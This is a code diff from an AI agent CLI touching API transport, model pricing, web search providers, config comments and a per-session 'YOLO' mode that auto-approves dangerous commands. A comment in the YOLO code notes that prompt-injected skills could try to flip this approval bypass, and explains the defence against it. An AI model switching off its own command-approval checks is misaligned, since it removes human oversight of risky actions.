is_xai_responses=bool(kwargs.get("is_xai_responses")),
replay_encrypted_reasoning=bool(
kwargs.get("replay_encrypted_reasoning", True)
),
current_issuer_kind=issuer,
)
def convert_tools(self, tools: List[Dict[str, Any]]) -> Any:
@@ -79,6 +102,17 @@ class ResponsesApiTransport(ProviderTransport):
is_github_responses = params.get("is_github_responses", False)
is_codex_backend = params.get("is_codex_backend", False)
is_xai_responses = params.get("is_xai_responses", False)
replay_encrypted_reasoning = bool(
params.get("replay_encrypted_reasoning", True)
)
# Resolve the issuing endpoint for this call. Stashed on the
# transport so normalize_response can stamp it onto reasoning
# items captured from the response, and passed to the input
# converter so foreign-issuer reasoning blocks in history are
# dropped before the API rejects them.
issuer_kind = self._resolve_issuer_kind(params)
self._last_issuer_kind = issuer_kind
# Resolve reasoning effort
reasoning_effort = "medium"
@@ -94,17 +128,27 @@ class ResponsesApiTransport(ProviderTransport):
reasoning_effort = _effort_clamp.get(reasoning_effort, reasoning_effort)
response_tools = _responses_tools(tools)
# ``tools`` MUST be omitted entirely when there are no functions to
# expose: the openai SDK's ``responses.stream()`` / ``responses.parse()``
# eagerly call ``_make_tools(tools)`` which does ``for tool in tools``
# without a None guard, so passing ``tools=None`` raises
# ``TypeError: 'NoneType' object is not iterable`` before any HTTP
# request is issued (openai==2.24.0). Reported for the
# ``openai-codex`` / ``gpt-5.5`` combo on chatgpt.com/backend-api/codex
# (#32892) when the agent runs without external tools registered.
kwargs = {
"model": model,
"instructions": instructions,
"input": _chat_messages_to_responses_input(
payload_messages,
is_xai_responses=is_xai_responses,
replay_encrypted_reasoning=replay_encrypted_reasoning,
current_issuer_kind=issuer_kind,
),
"tools": response_tools,
"store": False,
}
if response_tools:
kwargs["tools"] = response_tools
kwargs["tool_choice"] = "auto"
kwargs["parallel_tool_calls"] = True
@@ -121,7 +165,9 @@ class ResponsesApiTransport(ProviderTransport):
# replay them on subsequent turns for cross-turn coherence.
# See agent/codex_responses_adapter._chat_messages_to_responses_input
# for the May 2026 reversal of the earlier suppression gate.
kwargs["include"] = ["reasoning.encrypted_content"]
kwargs["include"] = (
["reasoning.encrypted_content"] if replay_encrypted_reasoning else []
)
# xAI rejects `reasoning.effort` on grok-4 / grok-4-fast / grok-3
# / grok-code-fast / grok-4.20-0309-* with HTTP 400 even though
# those models reason natively. Only send the effort dial when
@@ -136,7 +182,9 @@ class ResponsesApiTransport(ProviderTransport):
kwargs["reasoning"] = github_reasoning
else:
kwargs["reasoning"] = {"effort": reasoning_effort, "summary": "auto"}
kwargs["include"] = ["reasoning.encrypted_content"]
kwargs["include"] = (
["reasoning.encrypted_content"] if replay_encrypted_reasoning else []
)
elif not is_github_responses and not is_xai_responses:
kwargs["include"] = []
@@ -144,6 +192,17 @@ class ResponsesApiTransport(ProviderTransport):
if request_overrides:
kwargs.update(request_overrides)
# xAI Responses API rejects ``service_tier`` (HTTP 400 "Argument not
# supported: service_tier") — hit when ``/fast`` priority-processing
# mode lingers from a prior model in the same session, or when a
# user explicitly sets ``agent.service_tier`` in config.yaml. The
# main-loop guard (``resolve_fast_mode_overrides`` only returns
# ``service_tier`` for OpenAI fast-eligible models) doesn't cover
# those leak paths, so strip defensively when targeting xAI. See
# #28490 for the original report.
if is_xai_responses:
kwargs.pop("service_tier", None)
# Forward per-request timeout to the SDK so OpenAI/Anthropic clients
# honor it. Without this, ``providers.<id>.request_timeout_seconds``
# is silently dropped on the main agent Codex path while the
@@ -213,8 +272,13 @@ class ResponsesApiTransport(ProviderTransport):
_normalize_codex_response,
)
# Issuer for this response = explicit kwarg if the caller knows it,
# otherwise the stash from the matching build_kwargs/convert_messages
# call. Either way it gets stamped onto reasoning items so future
# turns can detect a model swap and drop foreign-issuer blobs.
issuer_kind = kwargs.get("issuer_kind") or self._last_issuer_kind
# _normalize_codex_response returns (SimpleNamespace, finish_reason_str)
msg, finish_reason = _normalize_codex_response(response)
msg, finish_reason = _normalize_codex_response(response, issuer_kind=issuer_kind)
tool_calls = None
if msg and msg.tool_calls:
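Two of the request-shaping rules described in the comments above (omit `tools` entirely when there is nothing to expose, and strip `service_tier` when targeting xAI) can be sketched in isolation. This is a simplified illustration under assumptions: `build_request_kwargs` is a hypothetical function, not the transport's real `build_kwargs`, and it ignores reasoning, timeouts, and input conversion.

```python
from typing import Any, Dict, List, Optional


def build_request_kwargs(
    model: str,
    tools: Optional[List[Dict[str, Any]]],
    *,
    is_xai_responses: bool = False,
    request_overrides: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
    """Assemble request kwargs (hypothetical, simplified)."""
    kwargs: Dict[str, Any] = {"model": model, "store": False}

    # Only add tool-related keys when there is at least one tool, so the
    # "tools" key is never present with a None or empty value.
    if tools:
        kwargs["tools"] = tools
        kwargs["tool_choice"] = "auto"
        kwargs["parallel_tool_calls"] = True

    if request_overrides:
        kwargs.update(request_overrides)

    # Strip after applying overrides so a lingering service_tier cannot
    # leak through to an endpoint that rejects it.
    if is_xai_responses:
        kwargs.pop("service_tier", None)

    return kwargs
```

The ordering is the point of the sketch: the defensive `pop` runs after `request_overrides` is merged, matching the order of the hunks above.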
+30 -2
@@ -83,6 +83,34 @@ _UTC_NOW = lambda: datetime.now(timezone.utc)
# Official docs snapshot entries. Models whose published pricing and cache
# semantics are stable enough to encode exactly.
_OFFICIAL_DOCS_PRICING: Dict[tuple[str, str], PricingEntry] = {
# ── Anthropic Claude 4.8 ─────────────────────────────────────────────
# Same $5/$25 base pricing as 4.6/4.7. Fast-mode variant is a separate
# model ID with 2x premium (vs the 6x premium on older Opus generations).
# Source: https://openrouter.ai/anthropic/claude-opus-4.8
(
"anthropic",
"claude-opus-4-8",
): PricingEntry(
input_cost_per_million=Decimal("5.00"),
output_cost_per_million=Decimal("25.00"),
cache_read_cost_per_million=Decimal("0.50"),
cache_write_cost_per_million=Decimal("6.25"),
source="official_docs_snapshot",
source_url="https://platform.claude.com/docs/en/about-claude/pricing",
pricing_version="anthropic-pricing-2026-05",
),
(
"anthropic",
"claude-opus-4-8-fast",
): PricingEntry(
input_cost_per_million=Decimal("10.00"),
output_cost_per_million=Decimal("50.00"),
cache_read_cost_per_million=Decimal("1.00"),
cache_write_cost_per_million=Decimal("12.50"),
source="official_docs_snapshot",
source_url="https://openrouter.ai/anthropic/claude-opus-4.8-fast",
pricing_version="anthropic-pricing-2026-05",
),
# ── Anthropic Claude 4.7 ─────────────────────────────────────────────
# Opus 4.5/4.6/4.7 share $5/$25 pricing (new tokenizer, up to 35% more
# tokens for the same text).
@@ -711,8 +739,8 @@ def normalize_usage(
output_tokens = _to_int(getattr(response_usage, "completion_tokens", 0))
details = getattr(response_usage, "prompt_tokens_details", None)
# Primary: OpenAI-style prompt_tokens_details. Fallback: Anthropic-style
# top-level fields that some OpenAI-compatible proxies (OpenRouter, Vercel
# AI Gateway, Cline) expose when routing Claude models — without this
# top-level fields that some OpenAI-compatible proxies (OpenRouter, Cline)
# expose when routing Claude models — without this
# fallback, cache writes are undercounted as 0 and cache reads can be
# missed when the proxy only surfaces them at the top level.
# Port of cline/cline#10266.
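To show how per-million rates like the ones added above turn into a dollar figure, here is a minimal sketch. `Rates` and `estimate_cost` are hypothetical stand-ins and not the repository's `PricingEntry` or its cost function; the field names are borrowed from the diff, and the formula assumes each token class is billed independently at its own rate.

```python
from dataclasses import dataclass
from decimal import Decimal

MILLION = Decimal(1_000_000)


@dataclass(frozen=True)
class Rates:
    """Per-million-token prices in USD (hypothetical stand-in for PricingEntry)."""
    input_cost_per_million: Decimal
    output_cost_per_million: Decimal
    cache_read_cost_per_million: Decimal
    cache_write_cost_per_million: Decimal


def estimate_cost(
    rates: Rates,
    *,
    input_tokens: int,
    output_tokens: int,
    cache_read_tokens: int = 0,
    cache_write_tokens: int = 0,
) -> Decimal:
    """Sum each token class multiplied by its rate, scaled from per-million."""
    total = (
        Decimal(input_tokens) * rates.input_cost_per_million
        + Decimal(output_tokens) * rates.output_cost_per_million
        + Decimal(cache_read_tokens) * rates.cache_read_cost_per_million
        + Decimal(cache_write_tokens) * rates.cache_write_cost_per_million
    )
    return total / MILLION
```

`Decimal` is used throughout, as in the entries above, to avoid binary floating-point rounding in the totals.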
+6 -42
@@ -61,14 +61,14 @@ from typing import Any, Dict, List
class WebSearchProvider(abc.ABC):
"""Abstract base class for a web search/extract/crawl backend.
"""Abstract base class for a web search/extract backend.
Subclasses must implement :meth:`is_available` and at least one of
:meth:`search` / :meth:`extract` / :meth:`crawl`. The
:meth:`supports_search` / :meth:`supports_extract` / :meth:`supports_crawl`
capability flags let the registry route each tool call to the right
provider, and let multi-capability providers (Firecrawl, Tavily, Exa,
...) advertise multiple capabilities from a single class.
:meth:`search` / :meth:`extract`. The :meth:`supports_search` /
:meth:`supports_extract` capability flags let the registry route each
tool call to the right provider, and let multi-capability providers
(Firecrawl, Tavily, Exa, ...) advertise multiple capabilities from a
single class.
"""
@property
@@ -113,22 +113,6 @@ class WebSearchProvider(abc.ABC):
"""
return False
def supports_crawl(self) -> bool:
"""Return True if this provider implements :meth:`crawl`.
Crawl differs from extract in that the agent provides a *seed URL*
and the provider walks linked pages on its own; useful for
documentation sites where the agent doesn't know all relevant
URLs upfront. Tavily is the only built-in backend that natively
crawls today; Firecrawl provides a similar capability that we
don't currently surface as a tool.
Providers that don't crawl should leave this as False; the
dispatcher in :func:`tools.web_tools.web_crawl_tool` will fall
back to its auxiliary-model summarization path.
"""
return False
def search(self, query: str, limit: int = 5) -> Dict[str, Any]:
"""Execute a web search.
@@ -173,26 +157,6 @@ class WebSearchProvider(abc.ABC):
f"{self.name} does not support extract (override supports_extract)"
)
def crawl(self, url: str, **kwargs: Any) -> Any:
"""Crawl a seed URL and return results.
Override when :meth:`supports_crawl` returns True. The default
raises NotImplementedError; callers should gate on
:meth:`supports_crawl` before calling.
Return shape: ``{"results": [{"url": str, "title": str,
"content": str, ...}, ...]}`` matching what
:func:`tools.web_tools.web_crawl_tool` post-processing expects.
Implementations MAY be ``async def``.
``kwargs`` may carry forward-compat fields (e.g. ``max_depth``,
``include_domains``); implementations should ignore unknown keys.
"""
raise NotImplementedError(
f"{self.name} does not support crawl (override supports_crawl)"
)
def get_setup_schema(self) -> Dict[str, Any]:
"""Return provider metadata for the ``hermes tools`` picker.
+6 -23
@@ -11,7 +11,7 @@ Active selection
----------------
The active provider is chosen by configuration with this precedence:
1. ``web.search_backend`` / ``web.extract_backend`` / ``web.crawl_backend``
1. ``web.search_backend`` / ``web.extract_backend``
(per-capability override).
2. ``web.backend`` (shared fallback).
3. If exactly one capability-eligible provider is registered AND available,
@@ -24,10 +24,10 @@ The active provider is chosen by configuration with this precedence:
5. Otherwise ``None``: the tool surfaces a helpful error pointing at
``hermes tools``.
The capability filter (``supports_search`` / ``supports_extract`` /
``supports_crawl``) is applied at every step so a search-only provider
(``brave-free``) configured as ``web.extract_backend`` correctly falls
through to an extract-capable backend.
The capability filter (``supports_search`` / ``supports_extract``) is
applied at every step so a search-only provider (``brave-free``)
configured as ``web.extract_backend`` correctly falls through to an
extract-capable backend.
"""
from __future__ import annotations
@@ -131,7 +131,7 @@ _LEGACY_PREFERENCE = (
def _resolve(configured: Optional[str], *, capability: str) -> Optional[WebSearchProvider]:
"""Resolve the active provider for a capability ("search" | "extract" | "crawl").
"""Resolve the active provider for a capability ("search" | "extract").
Resolution rules (in order):
@@ -168,8 +168,6 @@ def _resolve(configured: Optional[str], *, capability: str) -> Optional[WebSearc
return bool(p.supports_search())
if capability == "extract":
return bool(p.supports_extract())
if capability == "crawl":
return bool(p.supports_crawl())
return False
def _is_available_safe(p: WebSearchProvider) -> bool:
@@ -241,21 +239,6 @@ def get_active_extract_provider() -> Optional[WebSearchProvider]:
return _resolve(explicit, capability="extract")
def get_active_crawl_provider() -> Optional[WebSearchProvider]:
"""Resolve the currently-active web crawl provider.
Reads ``web.crawl_backend`` (preferred) or ``web.backend`` (shared
fallback) from config.yaml; falls back per the module docstring.
Crawl is a niche capability; among built-in providers only Tavily and
Firecrawl implement it. Callers should expect ``None`` and fall back to
a different strategy (e.g. summarize-via-LLM) when neither is
configured.
"""
explicit = _read_config_key("web", "crawl_backend") or _read_config_key("web", "backend")
return _resolve(explicit, capability="crawl")
def _reset_for_tests() -> None:
"""Clear the registry. **Test-only.**"""
with _lock:
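The precedence rules from the module docstring above (per-capability override, then shared fallback, then a single eligible provider, with the capability filter applied at every step) can be sketched as follows. This is an assumption-laden illustration: `Provider` and `resolve` are hypothetical, the registry is a plain dict, and the legacy-preference step that the diff elides is deliberately left out.

```python
from typing import Dict, Optional


class Provider:
    """Minimal stand-in for a web provider (hypothetical)."""

    def __init__(self, name: str, *, search: bool = False,
                 extract: bool = False, available: bool = True) -> None:
        self.name = name
        self.available = available
        self._caps = {"search": search, "extract": extract}

    def supports(self, capability: str) -> bool:
        return self._caps.get(capability, False)


def resolve(registry: Dict[str, Provider], per_capability: Optional[str],
            shared: Optional[str], capability: str) -> Optional[Provider]:
    """Resolve the active provider for a capability (simplified sketch)."""

    def eligible(p: Optional[Provider]) -> bool:
        return p is not None and p.available and p.supports(capability)

    # Steps 1 and 2: explicit config, filtered by capability so that a
    # search-only provider configured for extract falls through.
    for name in (per_capability, shared):
        if name and eligible(registry.get(name)):
            return registry[name]

    # Step 3: exactly one eligible provider is registered and available.
    candidates = [p for p in registry.values() if eligible(p)]
    if len(candidates) == 1:
        return candidates[0]

    # The legacy preference order is omitted here; otherwise give up.
    return None
```

With a search-only `brave-free` and a dual-capability `firecrawl` registered, configuring `brave-free` for extract falls through to `firecrawl`, which is the behavior the docstring describes.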
+68 -1
@@ -29,7 +29,6 @@ model:
# "arcee" - Arcee AI Trinity models (requires: ARCEEAI_API_KEY)
# "ollama-cloud" - Ollama Cloud (requires: OLLAMA_API_KEY — https://ollama.com/settings)
# "kilocode" - KiloCode gateway (requires: KILOCODE_API_KEY)
# "ai-gateway" - Vercel AI Gateway (requires: AI_GATEWAY_API_KEY)
# "azure-foundry" - Microsoft Foundry / Azure OpenAI (API key or Entra ID)
# "lmstudio" - LM Studio local server (optional: LM_API_KEY, defaults to http://127.0.0.1:1234/v1)
#
@@ -917,6 +916,15 @@ display:
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Per-platform defaults can be quieter than the global setting. Telegram
# tunes for mobile: tool_progress and busy_ack_detail default off (no
# per-tool breadcrumb stream, no "iteration 21/60" debug detail in busy
# acks or heartbeats), but interim_assistant_messages and
# long_running_notifications STAY ON so the user has real signal between
# turn start and final answer (mid-turn assistant commentary + a single
# edit-in-place "⏳ Working — N min" heartbeat). Override under
# display.platforms.telegram.
# Auto-cleanup of temporary progress bubbles after the final response lands.
# On platforms that support message deletion (currently Telegram), this
# removes the tool-progress bubble, "⏳ Still working..." notices, and
@@ -940,6 +948,22 @@ display:
# false: Only send the final response
interim_assistant_messages: true
# Gateway-only long-running status heartbeats.
# When false, the platform does not receive periodic "⏳ Working — N min"
# notifications even if agent.gateway_notify_interval is non-zero. The
# heartbeat edits a single message in place (where the adapter supports
# editing) instead of posting a new bubble each interval.
# Default: true everywhere, including Telegram (silent agents are worse
# than a single edit-in-place heartbeat).
long_running_notifications: true
# Include detailed iteration/tool/status context in busy acknowledgments
# and long-running heartbeats. When true, busy acks show "iteration 21/60,
# terminal, 10 min" and the heartbeat shows "⏳ Working — 12 min,
# iteration 21/60, terminal". When false (Telegram default), both stay
# terse: "Interrupting current task" and "⏳ Working — 12 min, terminal".
busy_ack_detail: true
# What Enter does when Hermes is already busy (CLI and gateway platforms).
# interrupt: Interrupt the current run and redirect Hermes (default)
# queue: Queue your message for the next turn
@@ -1098,3 +1122,46 @@ display:
# - command: "~/.hermes/agent-hooks/log-orchestration.sh"
#
# hooks_auto_accept: false
# =============================================================================
# Web Dashboard
# =============================================================================
# OAuth gate configuration for `hermes dashboard --host <non-loopback>`.
# The bundled Nous Portal plugin reads these on startup; settings here are
# the canonical surface. Each can be overridden by an environment variable:
#
# dashboard.oauth.client_id <- HERMES_DASHBOARD_OAUTH_CLIENT_ID
# dashboard.oauth.portal_url <- HERMES_DASHBOARD_PORTAL_URL
# dashboard.public_url <- HERMES_DASHBOARD_PUBLIC_URL
#
# Env wins when set to a non-empty value. This is what Fly.io's platform-
# secret injection uses to push per-deploy client_ids without needing to
# bake a config.yaml into the image. Empty env values are treated as unset
# so a provisioned-but-not-populated secret can't shadow a valid entry here.
#
# Local dev / on-prem deploys should typically set these via config.yaml
# (the ~/.hermes/.env file is reserved for API keys and secrets).
#
# dashboard:
# oauth:
# client_id: "" # agent:{instance_id}; Portal provisions this at deploy
# portal_url: "" # blank → default https://portal.nousresearch.com
#
# # Force the absolute base URL the OAuth callback (and any other public
# # URL the dashboard hands to external systems) is built from. Set this
# # for deploys behind reverse proxies that don't reliably forward
# # X-Forwarded-Host / X-Forwarded-Proto / X-Forwarded-Prefix (manual
# # nginx setups, on-prem ingresses, custom-domain Fly deploys without
# # full proxy header chains).
# #
# # When set, the value is the complete authority: scheme + host +
# # optional path prefix (e.g. "https://example.com/hermes"). The OAuth
# # callback URL becomes "<public_url>/auth/callback" — X-Forwarded-Prefix
# # is IGNORED on this code path because the operator has explicitly
# # declared the public URL and we no longer need to guess.
# #
# # Leave empty to use the existing proxy-header reconstruction (the
# # default — works on Fly.io out of the box).
# #
# # public_url: "https://example.com/hermes"
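The override rule described in the comments above (a non-empty environment value wins, an empty one is treated as unset) and the callback URL construction can be sketched like this. `resolve_setting` and `callback_url` are hypothetical helpers, not functions from the dashboard plugin; treating whitespace-only values as empty and trimming a trailing slash from `public_url` are assumptions of this example.

```python
import os
from typing import Mapping, Optional


def resolve_setting(env_name: str, config_value: Optional[str],
                    environ: Mapping[str, str] = os.environ) -> Optional[str]:
    """Return the env value if non-empty, else the config value (hypothetical)."""
    env_value = environ.get(env_name, "")
    # Assumption: whitespace-only counts as empty, so a provisioned but
    # unpopulated secret cannot shadow a valid config.yaml entry.
    if env_value.strip():
        return env_value
    return config_value or None


def callback_url(public_url: str) -> str:
    """Build "<public_url>/auth/callback" (trailing-slash trim is an assumption)."""
    return public_url.rstrip("/") + "/auth/callback"
```

Passing `environ` explicitly keeps the helper easy to test without mutating the real process environment.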
+276 -51
@@ -168,7 +168,7 @@ from hermes_cli.browser_connect import (
try_launch_chrome_debug,
)
from hermes_cli.env_loader import load_hermes_dotenv
from utils import base_url_host_matches, is_truthy_value
from utils import base_url_host_matches
_hermes_home = get_hermes_home()
_project_env = Path(__file__).parent / '.env'
@@ -562,13 +562,12 @@ def load_cli_config() -> Dict[str, Any]:
"singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"modal_image": "TERMINAL_MODAL_IMAGE",
"daytona_image": "TERMINAL_DAYTONA_IMAGE",
"vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
# SSH config
"ssh_host": "TERMINAL_SSH_HOST",
"ssh_user": "TERMINAL_SSH_USER",
"ssh_port": "TERMINAL_SSH_PORT",
"ssh_key": "TERMINAL_SSH_KEY",
# Container resource config (docker, singularity, modal, daytona, vercel_sandbox -- ignored for local/ssh)
# Container resource config (docker, singularity, modal, daytona -- ignored for local/ssh)
"container_cpu": "TERMINAL_CONTAINER_CPU",
"container_memory": "TERMINAL_CONTAINER_MEMORY",
"container_disk": "TERMINAL_CONTAINER_DISK",
@@ -577,6 +576,8 @@ def load_cli_config() -> Dict[str, Any]:
"docker_env": "TERMINAL_DOCKER_ENV",
"docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"sandbox_dir": "TERMINAL_SANDBOX_DIR",
# Persistent shell (non-local backends)
"persistent_shell": "TERMINAL_PERSISTENT_SHELL",
@@ -3748,7 +3749,7 @@ class HermesCLI:
percent_label = f"{percent}%" if percent is not None else "--"
duration_label = snapshot["duration"]
yolo_active = bool(os.getenv("HERMES_YOLO_MODE"))
yolo_active = self._is_session_yolo_active()
if width < 52:
text = f"{snapshot['model_short']} · {duration_label}"
if yolo_active:
@@ -3809,7 +3810,7 @@ class HermesCLI:
# line and produce duplicated status bar rows over long sessions.
width = self._get_tui_terminal_width()
duration_label = snapshot["duration"]
yolo_active = bool(os.getenv("HERMES_YOLO_MODE"))
yolo_active = self._is_session_yolo_active()
if width < 52:
frags = [
@@ -6908,6 +6909,7 @@ class HermesCLI:
pass
# Switch to the new session
self._transfer_session_yolo(self.session_id, new_session_id)
self.session_id = new_session_id
self.session_start = now
self._pending_title = None
@@ -7155,11 +7157,13 @@ class HermesCLI:
* ``sys.platform == "win32"``: native Windows console (ConPTY /
win32_input) does not support the modal reliably.
* Called from a non-main thread: the prompt_toolkit event loop only
runs on the main thread; key bindings can't fire from a daemon
thread (same rationale as the ``_prompt_text_input`` thread guard
in PR #23454).
* ``self._app`` is not set: unit tests / non-interactive contexts.
On non-Windows platforms the modal itself is still safe from the
``process_loop`` daemon thread as long as the main-thread event loop
owns the prompt_toolkit buffer mutations. When we are off the main
thread, schedule the modal snapshot / restore work on ``self._app.loop``
via ``call_soon_threadsafe`` and keep the queue-based response path.
"""
import threading
import time as _time
@@ -7180,33 +7184,62 @@ class HermesCLI:
if sys.platform == "win32":
return self._prompt_text_input("Choice [1/2/3]: ")
# Mirror the thread-aware guard from _prompt_text_input (PR #23454):
# run_in_terminal and the modal queue both depend on the main-thread
# event loop. From a daemon thread the modal key bindings never fire.
if threading.current_thread() is not threading.main_thread():
try:
app_loop = self._app.loop
except Exception:
app_loop = None
in_main_thread = threading.current_thread() is threading.main_thread()
if not in_main_thread and app_loop is None:
return self._prompt_text_input("Choice [1/2/3]: ")
response_queue = queue.Queue()
self._capture_modal_input_snapshot()
self._slash_confirm_state = {
"title": title,
"detail": detail,
"choices": choices,
"selected": 0,
"response_queue": response_queue,
}
self._slash_confirm_deadline = _time.monotonic() + timeout
self._invalidate()
def _setup_modal() -> None:
self._capture_modal_input_snapshot()
self._slash_confirm_state = {
"title": title,
"detail": detail,
"choices": choices,
"selected": 0,
"response_queue": response_queue,
}
self._slash_confirm_deadline = _time.monotonic() + timeout
self._invalidate()
def _teardown_modal() -> None:
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
def _run_on_app_loop(fn) -> bool:
if in_main_thread or app_loop is None:
fn()
return True
ready = threading.Event()
def _wrapped() -> None:
try:
fn()
finally:
ready.set()
try:
app_loop.call_soon_threadsafe(_wrapped)
except Exception:
return False
return ready.wait(timeout=5)
if not _run_on_app_loop(_setup_modal):
return self._prompt_text_input("Choice [1/2/3]: ")
_last_countdown_refresh = _time.monotonic()
try:
while True:
try:
result = response_queue.get(timeout=1)
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
_run_on_app_loop(_teardown_modal)
return result
except queue.Empty:
remaining = self._slash_confirm_deadline - _time.monotonic()
@@ -7218,10 +7251,7 @@ class HermesCLI:
self._invalidate()
finally:
if self._slash_confirm_state is not None:
self._slash_confirm_state = None
self._slash_confirm_deadline = 0
self._restore_modal_input_snapshot()
self._invalidate()
_run_on_app_loop(_teardown_modal)
return None
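The `_run_on_app_loop` pattern in this hunk, scheduling a callback on another thread's event loop and blocking until it has run, can be shown in isolation. This is a sketch under assumptions: it uses a plain `asyncio` loop in place of the prompt_toolkit application loop, and `run_on_loop` is a hypothetical standalone function.

```python
import asyncio
import threading
from typing import Callable


def run_on_loop(loop: asyncio.AbstractEventLoop, fn: Callable[[], None],
                timeout: float = 5.0) -> bool:
    """Run fn on the loop's thread and wait for it to finish (hypothetical).

    Returns False if scheduling fails or fn has not finished within timeout.
    """
    ready = threading.Event()

    def _wrapped() -> None:
        try:
            fn()
        finally:
            # Always release the waiter, even if fn raises.
            ready.set()

    try:
        # call_soon_threadsafe is the supported way to schedule a callback
        # from a thread other than the one running the loop.
        loop.call_soon_threadsafe(_wrapped)
    except RuntimeError:
        # Raised, for example, when the loop has already been closed.
        return False
    return ready.wait(timeout=timeout)
```

The `try`/`finally` around `fn()` is what keeps the calling thread from hanging for the full timeout when the callback fails.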
def _submit_slash_confirm_response(self, value: str | None) -> None:
@@ -7559,8 +7589,19 @@ class HermesCLI:
parts = cmd_original.split(None, 1) # split off '/model'
raw_args = parts[1].strip() if len(parts) > 1 else ""
# Parse --provider and --global flags
model_input, explicit_provider, persist_global = parse_model_flags(raw_args)
# Parse --provider, --global, and --refresh flags
model_input, explicit_provider, persist_global, force_refresh = parse_model_flags(raw_args)
# --refresh: wipe the on-disk picker cache before building the
# provider list. Forces a live re-fetch of every authed provider's
# /v1/models endpoint on this open.
if force_refresh:
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
_cprint(" Cleared model picker cache. Refreshing...")
except Exception:
pass
# Single inventory context — replaces the inline config-slice the
# dashboard / TUI used to duplicate. Overlay live session state
@@ -7599,6 +7640,7 @@ class HermesCLI:
_cprint("")
_cprint(" /model <name> switch model")
_cprint(" /model --provider <slug> switch provider")
_cprint(" /model --refresh re-fetch live model lists")
return
self._open_model_picker(
@@ -9580,20 +9622,92 @@ class HermesCLI:
}
_cprint(labels.get(self.tool_progress_mode, ""))
def _toggle_yolo(self):
"""Toggle YOLO mode — skip all dangerous command approval prompts."""
import os
from hermes_cli.colors import Colors as _Colors
def _transfer_session_yolo(self, old_session_id: str, new_session_id: str) -> None:
"""Move YOLO bypass state from an old session key to a new one.
current = is_truthy_value(os.environ.get("HERMES_YOLO_MODE"))
if current:
os.environ.pop("HERMES_YOLO_MODE", None)
Called whenever ``self.session_id`` is reassigned mid-run: ``/branch``
forks into a new session, and auto-compression rotates the agent's
session id into a fresh continuation session. Without this transfer
the user's ``/yolo ON`` toggle would silently revert on the very next
turn (the same UX failure mode that motivated this entire fix), since
``_session_yolo`` is keyed by session id.
Mirrors ``tui_gateway/server.py`` (~line 1297-1305) which performs the
same transfer for the TUI's session-rename path. No-op when YOLO
wasn't enabled or when the ids match.
"""
if not old_session_id or not new_session_id or old_session_id == new_session_id:
return
try:
from tools.approval import (
disable_session_yolo,
enable_session_yolo,
is_session_yolo_enabled,
)
except Exception:
return
if is_session_yolo_enabled(old_session_id):
enable_session_yolo(new_session_id)
disable_session_yolo(old_session_id)
def _is_session_yolo_active(self) -> bool:
"""Whether YOLO bypass is currently enabled for this CLI session.
Reads from ``tools.approval._session_yolo`` (the same set that
``enable_session_yolo`` / ``disable_session_yolo`` write to) so the
status bar reflects the actual bypass state instead of a stale env
var. Also honors the process-start ``--yolo`` flag, which freezes
``HERMES_YOLO_MODE`` into ``_YOLO_MODE_FROZEN`` before tool imports
happen.
"""
try:
from tools.approval import (
_YOLO_MODE_FROZEN,
is_session_yolo_enabled,
)
except Exception:
return False
if _YOLO_MODE_FROZEN:
return True
# Use ``getattr`` so test fixtures that build a CLI via ``__new__``
# (skipping ``__init__``) don't trip an AttributeError here; the
# status-bar builders swallow exceptions silently but lose every
# field after the failure.
session_key = getattr(self, "session_id", None) or "default"
return is_session_yolo_enabled(session_key)
def _toggle_yolo(self):
"""Toggle YOLO mode — skip all dangerous command approval prompts.
Per-session toggle that mirrors the gateway and TUI ``/yolo`` handlers
(see ``gateway/run.py:_handle_yolo_command`` and
``tui_gateway/server.py`` key=="yolo"). We deliberately do NOT mutate
``HERMES_YOLO_MODE`` here: that env var is read once at module import
time into ``tools.approval._YOLO_MODE_FROZEN`` to keep prompt-injected
skills from flipping the bypass mid-session, so setting it after CLI
startup is a silent no-op. Routing through ``enable_session_yolo`` /
``disable_session_yolo`` gives the same auditable, per-session bypass
the other surfaces have. ``run_conversation`` binds
``self.session_id`` as the active approval session key via
``set_current_session_key`` so the bypass takes effect on the very
next dangerous command in this run.
"""
from hermes_cli.colors import Colors as _Colors
from tools.approval import (
disable_session_yolo,
enable_session_yolo,
is_session_yolo_enabled,
)
session_key = self.session_id or "default"
if is_session_yolo_enabled(session_key):
disable_session_yolo(session_key)
_cprint(
f" ⚠ YOLO mode {_Colors.BOLD}{_Colors.RED}OFF{_Colors.RESET}"
" — dangerous commands will require approval."
)
else:
os.environ["HERMES_YOLO_MODE"] = "1"
enable_session_yolo(session_key)
_cprint(
f" ⚡ YOLO mode {_Colors.BOLD}{_Colors.GREEN}ON{_Colors.RESET}"
" — all commands auto-approved. Use with caution."
@@ -10640,7 +10754,8 @@ class HermesCLI:
if not reqs.get("stt_available", reqs.get("stt_key_set")):
raise RuntimeError(
"Voice mode requires an STT provider for transcription.\n"
"Option 1: pip install faster-whisper (free, local)\n"
"Option 1: uv pip install faster-whisper "
"(free, local; `pip install faster-whisper` also works if pip is on PATH)\n"
"Option 2: Set GROQ_API_KEY (free tier)\n"
"Option 3: Set VOICE_TOOLS_OPENAI_KEY (paid)"
)
@@ -11729,6 +11844,23 @@ class HermesCLI:
set_secret_capture_callback(self._secret_capture_callback)
except Exception:
pass
# Bind this turn's approval session key into the contextvar so
# ``tools.approval.is_current_session_yolo_enabled()`` resolves
# against the same key that ``/yolo`` toggles under (see
# ``_toggle_yolo`` → ``enable_session_yolo(self.session_id)``).
# Mirrors ``tui_gateway/server.py`` and ``gateway/run.py`` which
# bind the same contextvar before invoking the agent.
try:
from tools.approval import (
reset_current_session_key,
set_current_session_key,
)
_approval_session_token = set_current_session_key(
self.session_id or "default"
)
except Exception:
reset_current_session_key = None # type: ignore[assignment]
_approval_session_token = None
agent_message = _voice_prefix + message if _voice_prefix else message
# Prepend pending model switch note so the model knows about the switch
_msn = getattr(self, '_pending_model_switch_note', None)
